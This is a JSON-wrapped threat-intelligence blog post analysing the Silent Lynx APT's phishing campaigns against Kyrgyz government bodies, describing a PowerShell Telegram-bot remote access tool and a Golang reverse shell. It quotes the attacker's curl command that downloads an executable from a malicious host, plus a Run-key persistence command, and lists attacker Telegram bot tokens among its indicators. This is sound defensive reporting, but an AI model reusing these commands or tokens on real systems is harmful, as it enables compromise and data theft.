{
	"id": "9f1adcd1-75fa-4878-bde5-09a1f60ece9d",
	"created_at": "2026-04-06T00:11:04.988376Z",
	"updated_at": "2026-04-10T13:11:36.390306Z",
	"deleted_at": null,
	"sha1_hash": "225d3d7ed6d7f8800671e95afeaa1f2d82994af9",
	"title": "Unveiling Silent Lynx APT Targeting Entities Across Kyrgyzstan \u0026 Neighbouring Nations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1894600,
	"plain_text": "Unveiling Silent Lynx APT Targeting Entities Across Kyrgyzstan \u0026\r\nNeighbouring Nations\r\nBy Subhajeet Singha\r\nPublished: 2025-01-21 · Archived: 2026-04-05 16:02:01 UTC\r\nSilent Lynx APT Targets Various Entities Across Kyrgyzstan \u0026 Neighbouring Nations\r\nContents\r\nKey Targets\r\nIndustries Affected\r\nGeographical Focus\r\nInfection Chain\r\nInitial Findings\r\nCampaign 1\r\nLooking into the malicious email\r\nLooking into the decoy document\r\nCampaign 2\r\nLooking into the malicious email\r\nLooking into the decoy document\r\nTechnical Analysis\r\nCampaign 1\r\nStage 1 – Malicious ISO File\r\nStage 2 – Malicious C++ Loader\r\nStage 3 – Malicious PowerShell Script\r\nCampaign 2\r\nStage 1 – Malicious Golang Reverse-Shell\r\nInfrastructure \u0026 Hunting\r\nAttribution\r\nConclusion\r\nSeqrite Protection\r\nIOCs\r\nMITRE ATT\u0026CK\r\nIntroduction\r\nSeqrite Labs APT-Team has recently uncovered two fresh campaigns of a new threat group, which we have dubbed Silent Lynx. This threat group has previously targeted entities in Eastern Europe and Central Asian government think tanks involved in economic decision making and the banking sector. The first campaign targets Kyrgyzstan, one of the member nations of SPECA (Special Programme for the Economies of Central Asia), where the threat group delivered a UN-themed lure to government entities of the National Bank of the Kyrgyz Republic, while the second campaign targets the Ministry of Finance of Kyrgyzstan.\r\nIn this blog, we explore the in-depth technical details of the campaigns we encountered during our analysis. We examine the various stages of the first campaign, where infection starts with a phishing email carrying an RAR attachment, which contains a malicious ISO file holding a benign decoy document along with a malicious C++ payload. 
The payload contains an embedded, Base64-encoded PowerShell script acting as a remote access tool on the victim machine. In the second campaign,\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 1 of 19\n\nthe phishing email has a password-protected RAR file attached, which contains a decoy document and a malicious Golang implant. We also look at the infrastructure covering the entire campaign.\r\nKey Targets\r\nIndustries Affected\r\nEmbassies\r\nLawyers\r\nGovernment Banks\r\nGovernment Think-Tanks\r\nGeographical Focus\r\nKyrgyzstan\r\nTurkmenistan\r\nInfection Chain\r\nInitial Findings\r\nCampaign 1\r\nOn December 27, 2024, our team discovered a malicious Outlook message file targeting an official of the National Bank of the Kyrgyz Republic. The message contains an RAR-compressed attachment named 20241228_140656.rar. Upon examining the RAR file, we found a malicious ISO file named 20241228_140656.iso. The ISO file includes a malicious executable named Xerox_Scan17510875802718752175.exe, which spawns a PowerShell process. The arguments for the malicious PowerShell process are encoded in Base64 and embedded within the C++ executable. Additionally, the ISO file drops a decoy document titled 2024-00178nv Note Verbale_SPECA WG_2024. The same file was found by other threat researchers the very next day.\r\nLooking into the malicious email\r\nLooking into the malicious Outlook email, it became quite evident to us that the threat actor used a compromised email account of an employee of the National Bank of the Kyrgyz Republic. 
They delivered the malicious RAR file using this account along with an intriguing message stating that the email was meant for the Ministry of Finance but had been received by them instead.\r\nNow, let us look into the decoy PDF dropped by the malicious ISO file.\r\nLooking into the decoy document\r\nUpon extracting the ISO file, we identified two files: a malicious C++ executable and a decoy file. The decoy file is an invitation to the Nineteenth Session of the SPECA Working Group on Trade, held in Samarkand, Uzbekistan, on April 3, 2024. The document mimics legitimate communication from the United Nations Economic and Social Commission for Asia and the Pacific (ESCAP), leveraging the theme of “Leveraging Digitalization for Sustainable Supply Chains” to appear credible and relevant. This strategy reduces suspicion, as Kyrgyzstan is one of the SPECA member nations.\r\nCampaign 2\r\nLooking into the malicious email\r\nLooking into the malicious Outlook email in the second campaign, we can see that the threat actor is using the exact same compromised email account as in the first campaign. This time they delivered a password-protected RAR along with a message of urgency, luring employees with the promise of an employee bonus and targeting the Ministry of Finance of the Kyrgyz Republic. 
Now, let us look into the decoy document dropped from the RAR file.\r\nLooking into the decoy document\r\nUpon extracting the malicious RAR file, we discovered two files: a malicious Golang executable named Приложение №14-214-14-12-5-15docx and a decoy MS Word document titled Приказ №950-2-ГП о премировании.\r\nThe decoy document appears to be an official order issued by the Ministry of Finance of the Kyrgyz Republic, detailing employee bonus allocations. It includes the names of various employees along with the date of the order, January 8, 2025, making the lure appear timely and relevant. To enhance its legitimacy and reduce suspicion, the document also includes the name of a government official at the end.\r\nTechnical Analysis\r\nAs our team found two campaigns, we have divided the technical analysis into two parts: first we look into the first campaign, and later into the one which deploys a malicious Golang executable.\r\nCampaign 1\r\nStage 1 – Malicious ISO File\r\nThe RAR file contains a malicious ISO file named 20241228_140656.iso. Upon extracting the ISO file, we discovered a decoy PDF and a malicious C++ binary, which serves as the loader. 
In the next step, we analyze the C++ binary.\r\nStage 2 – Malicious C++ Loader\r\nBefore jumping into the analysis, we can confirm that the sample is not packed and is a C++ binary.\r\nUpon analysis, we found a giant blob of Base64-encoded content inside the malicious C++ executable, together with a PowerShell command which runs the encoded script with the -ExecutionPolicy Bypass flag, allowing unrestricted script execution.\r\nFinally, we can see that a PowerShell process is created using the CreateProcess API, which executes the encoded blob. In the next section, we examine the contents of the PowerShell blob executed by this loader.\r\nStage 3 – Malicious PowerShell Script\r\nAfter decoding the Base64-encoded script, we found that the threat actor is using a Telegram bot to perform command execution and data exfiltration. The script contains two interesting functions, Invoke-BotCmd \u0026 Invoke-BotDownload. Let us look at the working of these functions.\r\n① The Invoke-BotCmd function executes system commands received from the threat actor and sends the output of the executed command back through the Telegram Bot API. It takes a command as input, runs it using Invoke-Expression, and captures the output or any errors. The results are formatted with a unique identifier and sent back. If the output exceeds Telegram’s 4095-character limit, it is divided into chunks and sent in multiple messages. For shorter outputs, the message is sent directly. 
Therefore, this function facilitates remote command execution and response delivery, enabling interaction with the victim machine via the Telegram API.\r\n② The Invoke-BotDownload function uploads a file from the victim’s system to a Telegram chat controlled by the threat actor, enabling data exfiltration. It reads the file from a path specified by the threat actor, prepares the necessary metadata and content headers, and sends the file as a multipart form-data POST request to the Telegram API. Therefore, this function is designed to exfiltrate data from victim machines to the threat actor’s Telegram chat.\r\n③ The rest of the script forms the core operational logic of the bot, running in a continuous loop to monitor and process new messages from the threat actor. It uses the getUpdates API endpoint to fetch messages and acts on them based on their content. Commands like /sleep allow the bot’s sleep interval to be adjusted, /cmd lets it execute system commands using the Invoke-BotCmd function, and /download triggers file uploads from the victim machine through the Invoke-BotDownload function.\r\nFor custom commands with a specific identifier, the bot validates the identifier before performing the requested action. The script ensures that each message is processed only once by updating the last seen message ID, and implements error handling to retry failed API calls, pausing for random intervals to avoid abnormal network behaviour that could lead to early detection. 
This loop allows the bot to perform tasks such as running commands, exfiltrating data, and maintaining consistent communication with the threat actor.\r\nNow that we are done looking into the C++ loader and the PowerShell script, in the following sections we look into the infrastructure, other campaigns and some other activities performed by the threat actor.\r\nCampaign 2\r\nStage 1 – Malicious Golang Reverse-Shell\r\nUpon extraction of the malicious RAR file, we can see that there are only two files inside, one of which is the decoy document and the other the Golang executable.\r\nPeeking inside the binary, we find that it is a reverse shell written in Golang, using packages like net_dial to connect to the command and control; in case it fails to connect to the C2, it sleeps for 0.5 seconds, and it runs various commands.\r\nInfrastructure \u0026 Hunting\r\nIn the previous section, we saw that the threat actor is using a Telegram bot to perform actions on the victim system and other tasks like downloading. Fortunately, the bot token is hardcoded inside the PowerShell script, which led us to some interesting findings. 
This is the Telegram bot used in this campaign, which has been forwarding the contents to the threat actor.\r\nWe can also see a few common commands executed by the threat actor on the target machine, such as whoami and ipconfig, to perform discovery on the target system.\r\nAnother interesting case is that the threat actor (TA) downloads a malicious payload from a webserver and establishes persistence on the compromised system. Using the command cmd /c curl -o c:\\users\\public\\gservice.exe hxxps://pweobmxdlboi.com/147.exe, the TA downloads a malicious executable from a remote server and saves it as gservice.exe in the c:\\users\\public directory.\r\nTo ensure persistence, the threat actor executes a registry modification command, REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpTask /t REG_SZ /d c:\\users\\public\\gservice.exe /f, which adds the executable to the Windows Run key, causing it to launch automatically whenever the user logs in. The attacker then verifies the modification with the REG query command and confirms that the persistence mechanism was successfully established with the message “Операция успешно завершена” (“The operation was successfully completed”).\r\nOne of the compromised victims is believed to be closely linked to diplomatic operations between Turkmenistan and Kyrgyzstan. 
The presence of sensitive files, such as “Turkmenistanyn Gyrgyz Respublikasyndaky Ilcihanasynyn meyilnamasy.docx”, suggests the attackers targeted the victim to gather intelligence on diplomatic plans and relations, indicating espionage to be one of the primary goals of this campaign, not limited to the bank but extending to other government entities as well.\r\nWhile hunting for other campaigns run by the same threat actor, in fact the exact same operator (same Telegram user), we found that the threat actor has also been using other Telegram-based bots to run campaigns against various victims across the same geographic region.\r\nIn addition to this, we found that the threat actor has been using an open-source red-team tool known as resocks, which the threat actor hosted on their infrastructure.\r\nThe domains where the threat actor hosted their malicious implants are as follows.\r\nMalicious Domains\r\nhxxps:[//]pweobmxdlboi[.]com\r\nhxxps:[//]document[.]hometowncity[.]cloud\r\nhxxps:[//]mailboxdownload[.]com\r\nUpon hunting further, we found that the threat actor also uses Google Drive to download further payloads onto the victim system and currently depends on C++ and MSIL implants. These either have a malicious PowerShell script embedded or download one from text-sharing services such as Pastebin, and in recent campaigns they have depended on Telegram for data exfiltration and Command \u0026 Control.\r\nAttribution\r\nAttribution is an essential metric when describing a threat actor or group. 
It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes.\r\nIn our ongoing tracking of Silent Lynx, we discovered notable similarities and overlaps with a Kazakhstan-based threat actor/group known as YoroTrooper, as identified by our colleagues at Cisco Talos. Let’s explore some of the key overlaps between Silent Lynx and YoroTrooper.\r\nKey Overlaps Between Silent Lynx and YoroTrooper\r\n1. Tooling Arsenal:\r\nResearchers at Cisco Talos observed that YoroTrooper frequently modifies and switches its toolset, creating a pseudo-anti-detection mechanism. Recent YoroTrooper operations have relied heavily on PowerShell-based tools. Similarly, Silent Lynx has demonstrated significant reliance on PowerShell tooling, with code overlaps observed between the two groups.\r\n2. Motivation:\r\nBoth Silent Lynx and YoroTrooper share similar motivations, primarily engaging in espionage targeting government entities in Kyrgyzstan and its neighboring nations.\r\nBeyond these examples, additional strong similarities reinforce the connection between these two threat groups. With a medium level of confidence, we attribute Silent Lynx as a Kazakhstan-origin threat actor that likely shares resources with YoroTrooper, positioning it as a Kazakhstan-oriented threat.\r\nConclusion\r\nSilent Lynx’s campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants. Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, highlights their focus on espionage in Central Asia and SPECA member nations. 
Silent Lynx also overlaps with YoroTrooper, which shows resource sharing, reinforcing their attribution as a Kazakhstan-based threat group.\r\nSEQRITE Protection\r\nSLynx\r\nGeneric\r\nIOCs\r\nFile-Type Filename SHA-256\r\nEXE 147.exe efb700681713cd50a2addd1fea6b7ee80c084467d3e87668688b9f0664206\r\nEXE Xerox_Scan17510875802718752175.exe e6f76a73180b4f2947764f4de57b52d037b482ece1a88dab9d3290e76be8c0\r\nEXE 14789.exe 3560660162f2268d52b69382c78192667a7eee5796d77418a8609b2f1709f\r\nEXE resocks.exe 297d1afa309cdf0c84f04994ffd59ee1e1175377c1a0a561eb25869909812c\r\nISO 20241228_140656.iso c045344b23fc245f35a0ff4a6d6fa744d580cde45c8cd0849153dee7dce1d8\r\nEXE Приложение №14-214-14-12-5-15docx 1b76931775aa4de29df27a9de764b22f17ca117d6e5ae184f4ef617c970fc0\r\nEXE sokcs.exe 66294c9925ad454d5640f4fe753da9e7d6742f60b093ed97be88fcdd47b044\r\nEXE udadd.exe 99c6017c8658faf678f1b171c8eb5d5fa7e7d08e0a0901b984a8e3e1fab565\r\nDomains / URLs\r\nhxxps:[//]pweobmxdlboi[.]com\r\nhxxps:[//]document[.]hometowncity[.]cloud\r\nhxxps:[//]mailboxdownload[.]com\r\nhxxps[:]//api[.]telegram[.]org/bot8171872935:AAHLoudjpHz1bxA26bV5wPuOEL3LOHEl6Qk\r\nhxxps[:]//api[.]telegram[.]org/bot7898508392:AAF5FPbJ1jlPQfqCIGnx-zNdw2R5tF_Xxt0\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nReconnaissance T1589.002 Gather Victim Identity Information: Email Addresses\r\nInitial Access T1204.002 User Execution: Malicious File\r\nInitial Access T1078.002 Valid Accounts: Domain Accounts\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell\r\nPersistence T1547.001 Registry Run Keys / Startup Folder\r\nCredential Access T1056.001 Input Capture: Keylogging\r\nCredential Access T1552.001 Unsecured Credentials: Credentials In Files\r\nDiscovery T1087 Account Discovery\r\nDiscovery T1083 File and Directory Discovery\r\nDiscovery T1046 Network Service Discovery\r\nDiscovery T1012 Query Registry\r\nDiscovery T1018 Remote System Discovery\r\nDiscovery T1016 System Network Configuration Discovery\r\nDiscovery T1007 System Service Discovery\r\nCollection T1560.001 Archive Collected Data: Archive via Utility\r\nExfiltration T1567.002 Exfiltration to Cloud Storage\r\nAuthors\r\nSubhajeet Singha\r\nRhishav Kanjilal\r\nSource: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/"
	],
	"report_names": [
		"silent-lynx-apt-targeting-central-asian-entities"
	],
	"threat_actors": [
		{
			"id": "c416152c-d268-40a3-8887-01d2ec452b7c",
			"created_at": "2023-04-27T02:04:45.481771Z",
			"updated_at": "2026-04-10T02:00:04.987067Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Silent Lynx"
			],
			"source_name": "ETDA:YoroTrooper",
			"tools": [
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Meterpreter",
				"Nymeria",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "322248d6-4baf-4ada-af8e-074bc6c10132",
			"created_at": "2023-11-05T02:00:08.072145Z",
			"updated_at": "2026-04-10T02:00:03.397406Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Comrade Saiga",
				"Salted Earth",
				"Sturgeon Fisher",
				"ShadowSilk",
				"Silent Lynx",
				"Cavalry Werewolf",
				"SturgeonPhisher"
			],
			"source_name": "MISPGALAXY:YoroTrooper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434264,
	"ts_updated_at": 1775826696,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.pdf",
		"text": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.txt",
		"img": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.jpg"
	}
}